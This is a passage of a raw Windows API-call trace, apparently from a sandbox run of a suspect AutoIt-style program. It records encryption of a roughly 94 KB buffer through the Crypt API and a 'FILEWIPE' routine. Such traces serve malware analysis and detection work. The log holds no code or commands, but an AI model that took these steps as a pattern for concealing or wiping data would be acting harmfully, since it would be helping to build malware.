| out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.267] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.268] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.268] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.268] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.268] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.268] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.268] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.268] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.268] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.268] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.269] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.269] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.269] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.269] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.269] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.269] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.269] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.269] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0040.269] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.270] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.270] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17198, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x171a0) returned 1 [0040.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.270] CharLowerBuffW (in: lpsz="byte[94625]", cchLength=0xb | out: lpsz="byte[94625]") returned 0xb [0040.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.273] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.273] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.273] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.275] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x963348*, pdwDataLen=0x6ae220*=0x17198, dwBufLen=0x171a0 | out: pbData=0x963348*, pdwDataLen=0x6ae220*=0x171a0) returned 1 [0040.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.275] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.278] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.278] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.278] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.278] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.278] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.279] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.279] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.279] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0040.279] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.287] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.292] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.292] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.292] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.292] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.292] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.292] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.293] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.293] CryptDestroyKey (hKey=0x7c2200) returned 1 [0040.293] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.293] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.293] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.293] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.293] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.293] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.293] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.293] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.294] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.294] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.294] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.294] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.294] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.294] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.294] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.294] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.294] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.294] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.294] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.295] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.295] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.295] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.295] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.295] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.295] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.295] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0040.295] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.295] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.295] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.295] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.296] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.297] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.297] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 